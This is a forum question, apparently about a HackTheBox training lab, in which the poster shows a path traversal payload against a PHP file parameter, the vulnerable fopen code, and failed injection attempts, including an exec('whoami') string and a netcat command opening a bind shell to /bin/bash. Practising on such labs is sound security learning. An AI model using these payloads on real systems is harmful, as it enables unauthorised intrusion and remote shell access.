I am trying myself on an 'easy' pentest box of HackTheBox. During my investigation I found an endpoint with a vulnerable variable example.php?file= that gets not sanitised.
Through path traversal I was able to retrieve /etc/passwd as well as the source code of example.php (payload file=./../../../../../../var/www/html/example.php) which is the following:
<?php
$file = $_GET['file'];
$fh = fopen("files/$file","r");
while ($line = fgets($fh)) {
echo($line);
}
fclose($fh);
?>
Now I tried myself at injecting some addition PHP code into the example.php file but to no preveil. Given that what ever 'file' evaluates to gets put into fopen I tested the following payloads while trying to break out of the existing code:
","r");exec("whoami", $output);print_r($output);//get whoami returned in the response body, didn't work,, but gave a 200 response","r");exec("nc -l -p 8080 -e /bin/bash");//setup netcat backdoor to send commands directly to a shell - didn't work
Can someone help me figure this one out? How can I successfuly perform some form of remote code injection here on this clearly vulnerable piece of code? Thank's in advance